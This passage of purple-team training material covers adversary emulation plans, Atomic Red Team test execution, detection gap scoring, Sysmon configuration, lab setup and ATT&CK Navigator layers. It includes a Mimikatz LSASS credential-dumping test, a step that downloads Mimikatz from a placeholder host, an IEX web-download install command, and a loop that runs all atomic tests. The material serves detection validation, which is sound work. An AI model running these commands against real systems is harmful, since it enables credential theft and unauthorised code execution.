Purple Team Deep Dive — Adversary Emulation, Detection Validation & Gap Analysis


CIPHER training material for [MODE: PURPLE] operations, blacktemple.net. Last updated: 2026-03-14


Table of Contents

  1. Adversary Emulation Plan Structure
  2. Atomic Red Team Test Execution
  3. Detection Coverage Gap Analysis Methodology
  4. Sysmon Configuration for Maximum Visibility
  5. HELK & DetectionLab Setup
  6. ATT&CK Navigator Layer Creation
  7. Purple Team Engagement Runbook

1. Adversary Emulation Plan Structure

Source Framework: CTID Adversary Emulation Library

The Center for Threat-Informed Defense maintains emulation plans for real-world threat actors. Available full plans cover: APT29, Blind Eagle, Carbanak, FIN6, FIN7, menuPass, OceanLotus, OilRig, Sandworm, Turla, Wizard Spider.

Micro emulation plans target compound behaviors: Active Directory Enumeration, Data Exfiltration, DLL Sideloading, File Access/Modification, Log Clearing, Named Pipes, Process Injection, Reflective Loading, Remote Code Execution, User Execution, Web Shells, Windows Registry.

Emulation Plan Document Structure

EMULATION PLAN: [Threat Actor / Campaign Name]
===================================================

1. INTELLIGENCE SUMMARY
   - Threat actor profile (aliases, attribution, motivation)
   - Targeting patterns (sectors, geographies, infrastructure)
   - Historical campaigns with dates and references
   - Known tooling and malware families
   - ATT&CK group reference (e.g., G0016 for APT29)

2. OPERATIONAL FLOW
   - High-level kill chain / attack graph
   - Phase dependencies and decision points
   - Scenario scope (what is emulated vs. out of scope)

   Example phases:
     Phase 1: Initial Access (spearphishing, supply chain)
     Phase 2: Execution & Persistence
     Phase 3: Discovery & Lateral Movement
     Phase 4: Collection & Exfiltration
     Phase 5: Impact (if applicable)

3. STEP-BY-STEP PROCEDURES
   For each step:
   - Step ID (e.g., 1.A.1)
   - ATT&CK Technique ID (e.g., T1566.001)
   - Procedure description (human-readable)
   - Platform / prerequisites
   - Command(s) or tool invocation
   - Expected output / observable artifacts
   - Detection opportunity (telemetry sources, log events)
   - Cleanup / rollback procedure

4. DETECTION PLAN (Blue Team Counterpart)
   For each step:
   - Expected telemetry source (Sysmon Event ID, Windows Event ID, EDR)
   - Sigma/KQL/SPL detection rule or reference
   - Blind spots and assumptions
   - False positive considerations

5. ATT&CK NAVIGATOR LAYER
   - JSON layer file mapping all techniques exercised
   - Color-coded by detection maturity (red = no coverage, yellow = partial, green = validated)

Building a Custom Emulation Plan

Step 1: Select threat actor relevant to your organization's threat model
Step 2: Gather CTI — MITRE ATT&CK group page, vendor reports, OSINT
Step 3: Map observed TTPs to ATT&CK techniques
Step 4: Sequence procedures into operational phases
Step 5: For each procedure, identify:
        - Atomic Red Team test (if available)
        - Alternative tooling (Caldera, manual)
        - Expected telemetry and detection rules
Step 6: Build Navigator layer for the plan
Step 7: Document detection expectations BEFORE execution
Step 8: Execute, validate, gap-analyze
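Steps 3 through 8 go faster with a machine-readable plan. A minimal Python sketch of the step structure from the document template above (field names are illustrative, not the CTID schema):

```python
from dataclasses import dataclass, field, asdict
import json

@dataclass
class ProcedureStep:
    """One emulation step, mirroring the plan structure in this section."""
    step_id: str              # e.g. "1.A.1"
    technique_id: str         # ATT&CK ID, e.g. "T1566.001"
    description: str
    command: str
    telemetry: list = field(default_factory=list)  # expected log sources
    atomic_guid: str = ""     # matching Atomic Red Team test, if any

@dataclass
class EmulationPlan:
    actor: str
    attack_group: str         # e.g. "G0016"
    steps: list = field(default_factory=list)

    def navigator_techniques(self) -> list:
        """Unique technique IDs, ready to feed a Navigator layer."""
        return sorted({s.technique_id for s in self.steps})

plan = EmulationPlan(actor="APT29", attack_group="G0016")
plan.steps.append(ProcedureStep(
    step_id="1.A.1", technique_id="T1566.001",
    description="Spearphishing attachment delivery",
    command="(manual) send payload via phishing infrastructure",
    telemetry=["Sysmon Event 1", "Email gateway logs"],
))
print(json.dumps(asdict(plan.steps[0]), indent=2))
```

Keeping the plan in code makes Step 6 (build the Navigator layer) and Step 7 (document detection expectations before execution) diffable and repeatable.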

2. Atomic Red Team Test Execution

Test YAML Schema

Atomic Red Team tests are organized by ATT&CK technique ID under atomics/T####/T####.yaml.

attack_technique: T1003.001
display_name: "OS Credential Dumping: LSASS Memory"
atomic_tests:
  - name: "Mimikatz - Creds from Memory"
    auto_generated_guid: 5c2571d0-1572-416d-9676-812e64ca9f44
    description: "Dumps credentials from LSASS using Mimikatz"
    supported_platforms:
      - windows
    input_arguments:
      mimikatz_path:
        description: "Path to Mimikatz executable"
        type: path
        default: "C:\\tools\\mimikatz.exe"
    executor:
      name: powershell           # powershell | command_prompt | bash | sh | manual
      command: |
        #{mimikatz_path} "privilege::debug" "sekurlsa::logonpasswords" exit
      cleanup_command: |
        Remove-Item #{mimikatz_path} -Force -ErrorAction Ignore
      elevation_required: true
    dependencies:
      - description: "Mimikatz must be present"
        prereq_command: |
          if (Test-Path #{mimikatz_path}) { exit 0 } else { exit 1 }
        get_prereq_command: |
          Invoke-WebRequest -Uri "https://example.com/mimikatz.exe" -OutFile #{mimikatz_path}
    dependency_executor_name: powershell

Key schema elements:

  • input_arguments: Parameterized with #{variable_name} substitution syntax
  • executor.name: Determines shell context — powershell, command_prompt, bash, sh, manual
  • dependencies: Pre-flight checks with automated prerequisite installation
  • cleanup_command: Post-test system restoration
  • elevation_required: Flags tests needing admin/root
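The `#{variable_name}` substitution is plain token replacement against the declared defaults. A minimal Python sketch (simplified; the real Invoke-AtomicTest also lets callers override defaults at run time, e.g. with its `-InputArgs` parameter):

```python
import re

def render_command(command: str, input_arguments: dict) -> str:
    """Replace #{name} tokens with each declared argument's default value."""
    def repl(match):
        name = match.group(1)
        try:
            return str(input_arguments[name]["default"])
        except KeyError:
            raise KeyError(f"undeclared input argument: {name}")
    return re.sub(r"#\{(\w+)\}", repl, command)

args = {"mimikatz_path": {"type": "path", "default": "C:\\tools\\mimikatz.exe"}}
cmd = render_command('#{mimikatz_path} "privilege::debug" exit', args)
print(cmd)  # C:\tools\mimikatz.exe "privilege::debug" exit
```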

Invoke-AtomicRedTeam Execution Commands

Installation

# Install the module
Install-Module -Name invoke-atomicredteam,powershell-yaml -Scope CurrentUser

# Download atomic tests
IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing)
Install-AtomicRedTeam -getAtomics

Core Execution Commands

# Run all tests for a technique
Invoke-AtomicTest T1059.001

# Run specific test numbers
Invoke-AtomicTest T1059.001 -TestNumbers 1,2
Invoke-AtomicTest T1059.001-1,2              # short form

# Run by test name
Invoke-AtomicTest T1059.001 -TestNames "PowerShell Downgrade Attack"

# Run by GUID
Invoke-AtomicTest T1003 -TestGuids 5c2571d0-1572-416d-9676-812e64ca9f44

# Run ALL techniques (use with caution)
Invoke-AtomicTest All

# Skip confirmation prompts
Invoke-AtomicTest T1059.001 -Confirm:$false

# Set execution timeout
Invoke-AtomicTest T1059.001 -TimeoutSeconds 30

# Interactive mode (step through)
Invoke-AtomicTest T1003 -Interactive

Prerequisite Management

# Check and install prerequisites
Invoke-AtomicTest T1003 -GetPrereqs

# Check prereqs for specific test
Invoke-AtomicTest T1003 -TestGuids <guid> -GetPrereqs

Cleanup

# Run cleanup for a technique
Invoke-AtomicTest T1003 -Cleanup

# Cleanup specific test
Invoke-AtomicTest T1003 -TestGuids <guid> -Cleanup

Automated Bulk Execution (Purple Team Sweep)

# Iterate all Windows-supported non-manual tests
$techniques = Get-ChildItem C:\AtomicRedTeam\atomics\* -Recurse -Include T*.yaml |
              Get-AtomicTechnique

foreach ($technique in $techniques) {
    foreach ($atomic in $technique.atomic_tests) {
        if ($atomic.supported_platforms.contains("windows") -and
            ($atomic.executor.name -ne "manual")) {

            # Install prerequisites
            Invoke-AtomicTest $technique.attack_technique `
                -TestGuids $atomic.auto_generated_guid -GetPrereqs

            # Execute test
            Invoke-AtomicTest $technique.attack_technique `
                -TestGuids $atomic.auto_generated_guid

            Start-Sleep 3

            # Cleanup
            Invoke-AtomicTest $technique.attack_technique `
                -TestGuids $atomic.auto_generated_guid -Cleanup
        }
    }
}

Custom Atomics Path

$PSDefaultParameterValues = @{
    "Invoke-AtomicTest:PathToAtomicsFolder" = "C:\AtomicRedTeam\atomics"
}

Linux Execution (via PowerShell Core)

# Install pwsh on Debian/Ubuntu
apt-get install -y powershell

# Install module
pwsh -c 'Install-Module -Name invoke-atomicredteam,powershell-yaml -Scope CurrentUser -Force'

# Run test
pwsh -c 'Invoke-AtomicTest T1053.003 -TestNumbers 1'
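From an orchestration script, pwsh can be driven as a subprocess. This Python sketch only builds the argument vector; running it with subprocess.run assumes pwsh and the module are already installed:

```python
import shlex

def atomic_invocation(technique: str, test_numbers=None, cleanup=False) -> list:
    """Build a pwsh argv that runs Invoke-AtomicTest non-interactively."""
    ps = f"Invoke-AtomicTest {technique}"
    if test_numbers:
        ps += " -TestNumbers " + ",".join(str(n) for n in test_numbers)
    if cleanup:
        ps += " -Cleanup"
    ps += " -Confirm:$false"   # suppress confirmation prompts for automation
    return ["pwsh", "-NoProfile", "-c", ps]

argv = atomic_invocation("T1053.003", test_numbers=[1])
print(shlex.join(argv))
```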

3. Detection Coverage Gap Analysis Methodology

Framework: Palantir Alerting and Detection Strategy (ADS)

Every detection rule should be documented with these ten sections before production deployment:

ALERTING AND DETECTION STRATEGY
================================
1. Goal              — What adversary behavior does this detect?
2. Categorization    — ATT&CK tactic/technique mapping
3. Strategy Abstract — High-level detection approach
4. Technical Context — Data sources, log fields, processing logic
5. Blind Spots       — What this detection CANNOT see
                       (e.g., encrypted channels, kernel-level evasion)
6. Assumptions       — What must be true for detection to work
                       (e.g., Sysmon installed, PowerShell logging enabled)
7. False Positives   — Specific legitimate scenarios that trigger
                       (NOT "legitimate admin activity" — name the tool/process)
8. Validation        — How to confirm the detection works
                       (link to Atomic Red Team test or manual procedure)
9. Priority          — Alert severity and escalation path
10. Response         — Analyst investigation steps when alert fires
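A lightweight completeness check can gate rules before deployment; the section names below mirror the list above:

```python
ADS_SECTIONS = [
    "Goal", "Categorization", "Strategy Abstract", "Technical Context",
    "Blind Spots", "Assumptions", "False Positives", "Validation",
    "Priority", "Response",
]

def missing_ads_sections(doc_text: str) -> list:
    """Return the ADS sections absent from a detection's documentation."""
    lowered = doc_text.lower()
    return [s for s in ADS_SECTIONS if s.lower() not in lowered]

doc = """Goal: detect LSASS handle opens
Categorization: T1003.001 / credential-access
Strategy Abstract: alert on Sysmon Event 10 targeting lsass.exe
"""
print(missing_ads_sections(doc))
```

Wire this into the same pipeline that deploys Sigma rules so an incomplete ADS fails the build rather than reaching production.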

Gap Analysis Process

PHASE 1: INVENTORY CURRENT DETECTIONS
--------------------------------------
- Export all active SIEM rules/alerts
- Map each rule to ATT&CK technique IDs
- Score detection maturity per technique:
    0 = No detection
    1 = Log source available but no rule
    2 = Rule exists, not validated
    3 = Rule exists, validated with Atomic test
    4 = Rule validated, tuned, low false positive rate
    5 = Rule validated, tuned, tested against evasion variants

PHASE 2: MAP THREAT LANDSCAPE
------------------------------
- Identify relevant threat actors (industry, geography, asset type)
- Extract their ATT&CK technique sets from CTI
- Overlay threat actor techniques on your coverage matrix

PHASE 3: IDENTIFY GAPS
------------------------
- Techniques used by relevant actors with maturity < 3 = GAP
- Prioritize gaps by:
    1. Frequency of use across threat actors
    2. Impact if undetected (credential access > discovery)
    3. Feasibility of detection (data source availability)
    4. Compensating controls in place

PHASE 4: DEVELOP DETECTIONS
-----------------------------
- For each prioritized gap:
    a. Identify required data source (Sysmon event, Windows event, network)
    b. Verify data source is collected and indexed
    c. Write detection rule (Sigma preferred for portability)
    d. Document as ADS
    e. Validate with Atomic Red Team test
    f. Tune false positives in staging
    g. Deploy to production with monitoring period

PHASE 5: CONTINUOUS VALIDATION
-------------------------------
- Schedule recurring Atomic test execution (weekly/monthly)
- Automate: run test -> wait -> query SIEM -> assert alert fired
- Track coverage percentage over time
- Re-run gap analysis quarterly or after major infrastructure changes
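Phases 1 through 3 amount to joining the detection inventory against the threat-actor technique sets. A sketch with illustrative scores and actor mappings (substitute your own inventory and CTI):

```python
from collections import Counter

# Maturity scores per technique (Phase 1 inventory) -- sample data
coverage = {"T1059.001": 4, "T1003.001": 2, "T1055.001": 0, "T1021.002": 3}

# Techniques per relevant actor (Phase 2 CTI overlay) -- sample data
actors = {
    "APT29":         ["T1059.001", "T1003.001", "T1055.001"],
    "Wizard Spider": ["T1003.001", "T1021.002", "T1055.001"],
}

def gaps(coverage: dict, actors: dict, threshold: int = 3) -> list:
    """Techniques below the maturity threshold, ordered by actor frequency."""
    freq = Counter(t for ttps in actors.values() for t in ttps)
    flagged = [t for t in freq if coverage.get(t, 0) < threshold]
    return sorted(flagged, key=lambda t: -freq[t])

print(gaps(coverage, actors))  # ['T1003.001', 'T1055.001'] (each used by 2 actors)
```

Frequency is only the first prioritization criterion from Phase 3; impact, feasibility, and compensating controls still need analyst judgment.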

Detection Coverage Scoring Matrix

| Score | Label     | Criteria                                                       |
|-------|-----------|----------------------------------------------------------------|
| 0     | None      | No data source, no rule                                        |
| 1     | Telemetry | Data source collected but no detection logic                   |
| 2     | Draft     | Detection rule written, not validated                          |
| 3     | Validated | Rule fires on known-good test (Atomic/manual)                  |
| 4     | Tuned     | Rule validated + false positives addressed + documented ADS    |
| 5     | Resilient | Rule tested against evasion variants + blind spots documented  |

D3FEND Integration for Gap Analysis

MITRE D3FEND provides a defensive countermeasure knowledge graph complementary to ATT&CK. Use it to systematically verify coverage across seven defensive tactics:

| D3FEND Tactic | Purpose                             | Example Techniques                                              |
|---------------|-------------------------------------|-----------------------------------------------------------------|
| Model         | Asset discovery, dependency mapping | Asset Inventory, Vulnerability Analysis                         |
| Harden        | Reduce attack surface               | Certificate Pinning, Disk Encryption, Code Signing              |
| Detect        | Identify malicious activity         | File Analysis, Behavior Monitoring, Network Traffic Analysis    |
| Isolate       | Contain and segment                 | DNS Denylisting, Executable Allowlisting, Network Segmentation  |
| Deceive       | Mislead adversaries                 | Honeynets, Decoy Credentials, Decoy Network Resources           |
| Evict         | Remove threat presence              | Credential Rotation, Process Termination                        |
| Restore       | Recovery operations                 | System Image Recovery, Data Backup Restoration                  |

For each ATT&CK technique in your gap analysis, query D3FEND for mapped countermeasures. This reveals not just detection gaps but hardening, isolation, and deception opportunities.
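The lookup can be scripted once the mappings are exported locally. The entries below are an illustrative subset, not the authoritative D3FEND graph (the full mappings are published at d3fend.mitre.org):

```python
# Illustrative subset of ATT&CK -> D3FEND countermeasure mappings,
# grouped by D3FEND tactic. Replace with an export of the real graph.
D3FEND_MAP = {
    "T1003.001": {"Detect": ["Process Spawn Analysis"],
                  "Harden": ["Credential Hardening"],
                  "Evict":  ["Credential Rotation"]},
    "T1566.001": {"Detect":  ["File Analysis"],
                  "Isolate": ["Executable Allowlisting"]},
}

def countermeasures(technique_id: str) -> dict:
    """All mapped defensive options for a technique, grouped by tactic."""
    return D3FEND_MAP.get(technique_id, {})

for tactic, measures in countermeasures("T1003.001").items():
    print(f"{tactic}: {', '.join(measures)}")
```

Running every gap-analysis technique through this lookup surfaces the hardening, isolation, and deception options alongside the detection ones.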


4. Sysmon Configuration for Maximum Visibility

Configuration Approaches

Two primary open-source configs serve different use cases:

| Config         | Author          | Philosophy                                 | Best For                       |
|----------------|-----------------|--------------------------------------------|--------------------------------|
| sysmon-config  | SwiftOnSecurity | Balanced, educational, minimal perf impact | Production baseline            |
| sysmon-modular | Olaf Hartong    | Modular, composable, granular control      | Advanced/research environments |

Sysmon Event Types for Purple Team Coverage

| Event ID | Category             | Purple Team Value                                            |
|----------|----------------------|--------------------------------------------------------------|
| 1        | Process Creation     | Execution, command-line logging, parent-child relationships  |
| 3        | Network Connection   | C2 detection, lateral movement, data exfiltration            |
| 5        | Process Terminated   | Process lifecycle tracking                                   |
| 6        | Driver Loaded        | Rootkit detection, vulnerable driver abuse (BYOVD)           |
| 7        | Image Loaded         | DLL sideloading, injection detection                         |
| 8        | CreateRemoteThread   | Process injection (T1055)                                    |
| 10       | Process Access       | Credential dumping (LSASS access), process hollowing         |
| 11       | File Created         | Payload drops, staging directories                           |
| 12-14    | Registry Events      | Persistence mechanisms, config changes                       |
| 15       | FileCreateStreamHash | Alternate data streams (T1564.004)                           |
| 17-18    | Pipe Events          | Named pipe pivoting, C2 channels (Cobalt Strike)             |
| 19-21    | WMI Events           | WMI persistence, lateral movement                            |
| 22       | DNS Query            | C2 domain resolution, DNS tunneling                          |
| 23       | File Delete (archived) | Anti-forensics detection, evidence destruction             |
| 24       | Clipboard Change     | Data collection monitoring                                   |
| 25       | Process Tampering    | Process hollowing, herpaderping                              |
| 26       | File Delete Logged   | File deletion tracking (lightweight)                         |

sysmon-modular: Building a Custom Config

# Clone the repository
git clone https://github.com/olafhartong/sysmon-modular.git
cd sysmon-modular

# Merge all modules into a single config
# Uses the PowerShell merge function
Import-Module .\Merge-SysmonXml.ps1
Merge-AllSysmonXml -Path (Get-ChildItem '[0-9]*\*.xml') -AsString |
    Out-File sysmonconfig.xml

# Available pre-built configs:
#   sysmonconfig.xml         — Default balanced
#   sysmonconfig-verbose.xml — All events, exclusions only
#   sysmonconfig-research.xml — Maximum logging (NOT for production)
#   sysmonconfig-mde-augment.xml — Complement Microsoft Defender for Endpoint

Recommended Purple Team Sysmon Config Strategy

PRODUCTION ENVIRONMENT
  Use: SwiftOnSecurity or sysmon-modular default
  Rationale: Low performance impact, proven exclusions
  Tune: Add org-specific exclusions (AV, backup agents, known-good)

PURPLE TEAM LAB / TESTING
  Use: sysmon-modular verbose or research config
  Rationale: Maximum visibility to validate what telemetry tests produce
  Warning: Research config generates extreme log volume

DETECTION DEVELOPMENT
  Use: sysmon-modular with selective modules
  Rationale: Enable only event types relevant to technique under test
  Example: Testing T1055 (Process Injection) -> enable Events 1, 8, 10, 25
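The selective-module approach can be mechanized: emit a config skeleton that enables only the event types relevant to the technique under test. A sketch (the schemaversion and the technique-to-event rows are illustrative; verify tag names against your installed Sysmon schema with `sysmon -s`):

```python
import xml.etree.ElementTree as ET

# Event IDs worth enabling per technique under test -- sample rows,
# extend from the event table in this section
TECHNIQUE_EVENTS = {
    "T1055": [1, 8, 10, 25],    # process injection
    "T1053": [1, 12, 13, 14],   # scheduled tasks touch the registry
}

EVENT_TAGS = {1: "ProcessCreate", 8: "CreateRemoteThread",
              10: "ProcessAccess", 12: "RegistryEvent",
              13: "RegistryEvent", 14: "RegistryEvent",
              25: "ProcessTampering"}

def skeleton_config(technique: str) -> str:
    """Emit a Sysmon config skeleton enabling only relevant event types."""
    root = ET.Element("Sysmon", schemaversion="4.90")
    filtering = ET.SubElement(root, "EventFiltering")
    # dedupe: events 12-14 share the RegistryEvent tag
    for tag in dict.fromkeys(EVENT_TAGS[e] for e in TECHNIQUE_EVENTS[technique]):
        # an empty "exclude" section logs every event of that type
        ET.SubElement(filtering, tag, onmatch="exclude")
    return ET.tostring(root, encoding="unicode")

print(skeleton_config("T1055"))
```

Add include/exclude rules inside each section afterwards; an empty exclude section is deliberately maximal and only suitable for lab use.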

Installation Commands

# Windows — Install Sysmon with config
sysmon.exe -accepteula -i sysmonconfig.xml

# Update running config
sysmon.exe -c sysmonconfig.xml

# Dump the currently loaded config
sysmon.exe -c

# Dump the configuration schema
sysmon.exe -s

# Linux — Install Sysmon for Linux
# (requires sysinternalsebpf package)
sudo sysmon -accepteula -i sysmonconfig-linux.xml

Critical Tuning Rules for Purple Team

<!-- MUST INCLUDE: LSASS access monitoring for credential dumping -->
<RuleGroup groupRelation="or">
  <ProcessAccess onmatch="include">
    <TargetImage condition="is">C:\Windows\system32\lsass.exe</TargetImage>
  </ProcessAccess>
</RuleGroup>

<!-- MUST INCLUDE: Suspicious parent-child process relationships -->
<RuleGroup groupRelation="or">
  <ProcessCreate onmatch="include">
    <ParentImage condition="is">C:\Windows\System32\cmd.exe</ParentImage>
    <ParentImage condition="is">C:\Windows\System32\wscript.exe</ParentImage>
    <ParentImage condition="is">C:\Windows\System32\mshta.exe</ParentImage>
    <ParentImage condition="is">C:\Windows\System32\rundll32.exe</ParentImage>
  </ProcessCreate>
</RuleGroup>

<!-- MUST INCLUDE: Named pipe events for C2 detection -->
<RuleGroup groupRelation="or">
  <PipeEvent onmatch="exclude">
    <!-- Exclude known-good pipes, include everything else -->
    <PipeName condition="begin with">\PSHost</PipeName>
  </PipeEvent>
</RuleGroup>
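Whether a deployed config actually contains these rules can be asserted in CI. A sketch that checks the LSASS access rule:

```python
import xml.etree.ElementTree as ET

def has_lsass_rule(config_xml: str) -> bool:
    """True if any ProcessAccess include rule targets lsass.exe."""
    root = ET.fromstring(config_xml)
    for pa in root.iter("ProcessAccess"):
        if pa.get("onmatch") != "include":
            continue
        for target in pa.iter("TargetImage"):
            if target.text and target.text.lower().endswith("lsass.exe"):
                return True
    return False

config = """<Sysmon schemaversion="4.90"><EventFiltering>
  <RuleGroup groupRelation="or">
    <ProcessAccess onmatch="include">
      <TargetImage condition="is">C:\\Windows\\system32\\lsass.exe</TargetImage>
    </ProcessAccess>
  </RuleGroup>
</EventFiltering></Sysmon>"""
print(has_lsass_rule(config))  # True
```

The same pattern extends to the parent-child and named-pipe rules above: one predicate per must-include rule, run against the config file before each deployment.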

5. HELK & DetectionLab Setup

HELK (Hunting ELK)

Architecture:

                    +-----------------+
                    |  Jupyter        |
                    |  Notebooks      |
                    +--------+--------+
                             |
+----------+    +------------+------------+    +-----------+
| Logstash | -> | Elasticsearch           | -> |  Kibana   |
| (ingest) |    | (index + search)        |    |  (viz)    |
+----------+    +------------+------------+    +-----------+
                             |
                    +--------+--------+
                    |  Apache Spark   |
                    |  + GraphFrames  |
                    +-----------------+

Components:

  • Elasticsearch: Event storage, full-text search, aggregations
  • Logstash: Log ingestion, parsing, enrichment
  • Kibana: Dashboards, visualizations, investigation UI
  • Apache Spark: Distributed analytics, SQL queries over events
  • Jupyter Notebooks: Interactive threat hunting, hypothesis testing
  • GraphFrames: Entity relationship analysis (process trees, network graphs)

Deployment (Docker-based):

# Clone HELK
git clone https://github.com/Cyb3rWard0g/HELK.git
cd HELK/docker

# Run installer
sudo ./helk_install.sh

# Options during install:
#   Option 1: HELK + ELK (basic)
#   Option 2: HELK + ELK + Spark + Jupyter (full analytics)
#   Option 3: HELK + ELK + Spark + Jupyter + KSQL (streaming)
#   Option 4: HELK + ELK + Spark + Jupyter + KSQL + Elastalert (alerting)

# Access points after install:
#   Kibana:   https://<helk-ip>
#   Jupyter:  https://<helk-ip>:8888
#   Spark UI: https://<helk-ip>:4040

Ingesting Sysmon Logs into HELK:

Method 1: Winlogbeat (recommended)
  - Install Winlogbeat on Windows endpoints
  - Configure output to HELK Logstash (port 5044)
  - Winlogbeat ships Sysmon events from Windows Event Log

Method 2: NXLog
  - Alternative log shipper for Windows
  - Configure to forward Sysmon channel to Logstash

Method 3: Kafka input (for high-volume environments)
  - HELK supports Kafka as message broker
  - Winlogbeat -> Kafka -> Logstash -> Elasticsearch

Purple Team Use Cases:

  • Run Atomic Red Team test on endpoint
  • Observe events arrive in Kibana within seconds
  • Query Elasticsearch for specific technique artifacts
  • Use Jupyter notebooks for complex hunt queries (e.g., process tree analysis)
  • Build Spark-based analytics for anomaly detection
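The test-then-query loop can be automated against HELK's Elasticsearch. This sketch only builds the query body; the field names (and the index pattern in the comment) are assumptions based on HELK's normalized Sysmon mappings, so adjust them to your environment:

```python
import json

def sysmon_artifact_query(event_id: int, command_fragment: str,
                          since: str = "now-15m") -> dict:
    """Elasticsearch DSL: recent Sysmon events whose command line
    contains the given fragment."""
    return {
        "query": {"bool": {"filter": [
            {"term": {"event_id": event_id}},
            {"match_phrase": {"process_command_line": command_fragment}},
            {"range": {"@timestamp": {"gte": since}}},
        ]}},
        "size": 10,
    }

q = sysmon_artifact_query(1, "sekurlsa::logonpasswords")
print(json.dumps(q, indent=2))
# POST this body to the Sysmon index, e.g.
#   https://<helk-ip>:9200/logs-endpoint-winevent-sysmon-*/_search
```

Assert on the hit count after each Atomic test to turn the manual "observe events in Kibana" step into an automated validation.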

DetectionLab

Note: DetectionLab is no longer actively maintained as of January 2023. Consider Splunk Attack Range or custom lab builds as alternatives.

Architecture:

+-------------------+     +-------------------+
|   DC (Domain      |     |   WEF (Windows    |
|   Controller)     |     |  Event Forwarding)|
|   - Active Dir    |     |   - Splunk Fwdr   |
|   - DNS           |     |   - Sysmon        |
|   - GPO           |     |   - osquery/Fleet |
+-------------------+     +-------------------+
         |                          |
         +----------+---------------+
                    |
            +-------+-------+
            |    Logger     |
            |  - Splunk     |
            |  - Zeek       |
            |  - Suricata   |
            |  - Guacamole  |
            +---------------+

Pre-installed Tooling:

  • Splunk with pre-created indexes and forwarder
  • Sysmon with sysmon-modular config (Olaf Hartong)
  • osquery + Fleet management
  • Microsoft ATA
  • Zeek + Suricata for network monitoring
  • Apache Guacamole for browser-based VM access
  • PowerShell transcript logging enabled
  • Windows Event Forwarding subscriptions configured

Deployment Options:

  • VirtualBox / VMware (local)
  • AWS / Azure via Terraform
  • HyperV, LibVirt, Proxmox

Splunk Attack Range (Recommended Active Alternative)

# Docker Compose deployment (recommended)
git clone https://github.com/splunk/attack_range.git
cd attack_range
docker compose up -d

# Access points:
#   Web UI:   http://localhost:4321
#   REST API: http://localhost:4000 (OpenAPI at /openapi/swagger)

# Two-step build process:
#   1. Provision infrastructure via Web UI or CLI
#   2. Connect VPN (WireGuard) to lab network
#   3. Continue build to finalize environment

# Run Atomic Red Team simulation:
#   - Via Web UI: select technique, click simulate
#   - Via API: POST to simulation endpoint
#   - Via CLI: attack_range simulate -t T1059.001

Attack Range deploys:

  • Splunk (central analytics)
  • Windows Server / Workstation (targets)
  • Linux hosts
  • Optional: Kali Linux, Zeek, additional monitors
  • Supports AWS, Azure, GCP via Terraform + Ansible

6. ATT&CK Navigator Layer Creation

Layer JSON Structure (v4.x)

{
    "name": "Purple Team Coverage - Q1 2026",
    "versions": {
        "attack": "15",
        "navigator": "5.1",
        "layer": "4.5"
    },
    "domain": "enterprise-attack",
    "description": "Detection coverage assessment for purple team engagement",
    "filters": {
        "platforms": ["Windows", "Linux", "macOS"]
    },
    "sorting": 0,
    "layout": {
        "layout": "side",
        "aggregateFunction": "average",
        "showID": true,
        "showName": true,
        "showAggregateScores": false,
        "countUnscored": false,
        "expandedSubtechniques": "annotated"
    },
    "hideDisabled": false,
    "techniques": [
        {
            "techniqueID": "T1059.001",
            "tactic": "execution",
            "color": "#31a354",
            "comment": "Validated with ART test T1059.001-1. Sigma rule: proc_creation_win_powershell_suspicious_cmd.yml",
            "score": 4,
            "enabled": true,
            "metadata": [
                { "name": "detection_rule", "value": "sigma/proc_creation_win_powershell_suspicious_cmd.yml" },
                { "name": "atomic_test", "value": "T1059.001-1" },
                { "name": "last_validated", "value": "2026-03-01" },
                { "name": "data_source", "value": "Sysmon Event 1" }
            ],
            "links": [
                { "label": "Sigma Rule", "url": "https://github.com/SigmaHQ/sigma/..." },
                { "label": "ART Test", "url": "https://github.com/redcanaryco/atomic-red-team/..." }
            ],
            "showSubtechniques": true
        }
    ],
    "gradient": {
        "colors": ["#ff6666", "#ffeb3b", "#66bb6a"],
        "minValue": 0,
        "maxValue": 5
    },
    "legendItems": [
        { "label": "No Coverage (0)", "color": "#ff6666" },
        { "label": "Telemetry Only (1)", "color": "#ff9800" },
        { "label": "Draft Rule (2)", "color": "#ffeb3b" },
        { "label": "Validated (3)", "color": "#c6e377" },
        { "label": "Tuned (4)", "color": "#66bb6a" },
        { "label": "Resilient (5)", "color": "#1b5e20" }
    ],
    "showTacticRowBackground": true,
    "tacticRowBackground": "#dddddd",
    "selectTechniquesAcrossTactics": true,
    "selectSubtechniquesWithParent": false,
    "selectVisibleTechniques": false
}

Programmatic Layer Generation (Python)

"""Generate ATT&CK Navigator layer from detection inventory."""
import json

COVERAGE_COLORS = {
    0: "#ff6666",   # No coverage — red
    1: "#ff9800",   # Telemetry only — orange
    2: "#ffeb3b",   # Draft rule — yellow
    3: "#c6e377",   # Validated — light green
    4: "#66bb6a",   # Tuned — green
    5: "#1b5e20",   # Resilient — dark green
}

def create_layer(
    name: str,
    techniques: list[dict],
    domain: str = "enterprise-attack",
    description: str = "",
) -> dict:
    """
    Create an ATT&CK Navigator layer.

    Args:
        name: Layer display name
        techniques: List of dicts with keys:
            - techniqueID (str): e.g., "T1059.001"
            - tactic (str, optional): e.g., "execution"
            - score (int): 0-5 coverage score
            - comment (str, optional): notes
        domain: ATT&CK domain
        description: Layer description

    Returns:
        dict: Complete Navigator layer JSON
    """
    technique_entries = []
    for t in techniques:
        score = t.get("score", 0)
        entry = {
            "techniqueID": t["techniqueID"],
            "score": score,
            "color": COVERAGE_COLORS.get(score, "#ffffff"),
            "comment": t.get("comment", ""),
            "enabled": True,
        }
        if "tactic" in t:
            entry["tactic"] = t["tactic"]
        if "metadata" in t:
            entry["metadata"] = t["metadata"]
        technique_entries.append(entry)

    return {
        "name": name,
        "versions": {
            "attack": "15",
            "navigator": "5.1",
            "layer": "4.5",
        },
        "domain": domain,
        "description": description,
        "techniques": technique_entries,
        "gradient": {
            "colors": ["#ff6666", "#ffeb3b", "#66bb6a"],
            "minValue": 0,
            "maxValue": 5,
        },
        "legendItems": [
            {"label": f"{label} ({score})", "color": COVERAGE_COLORS[score]}
            for score, label in enumerate(
                ["No Coverage", "Telemetry Only", "Draft Rule",
                 "Validated", "Tuned", "Resilient"]
            )
        ],
        "showTacticRowBackground": True,
        "tacticRowBackground": "#dddddd",
        "selectTechniquesAcrossTactics": True,
    }


def save_layer(layer: dict, filepath: str) -> None:
    """Save layer to JSON file for Navigator import."""
    with open(filepath, "w") as f:
        json.dump(layer, f, indent=2)


# Example usage:
if __name__ == "__main__":
    detections = [
        {"techniqueID": "T1059.001", "tactic": "execution", "score": 4,
         "comment": "PowerShell logging + Sigma rule validated"},
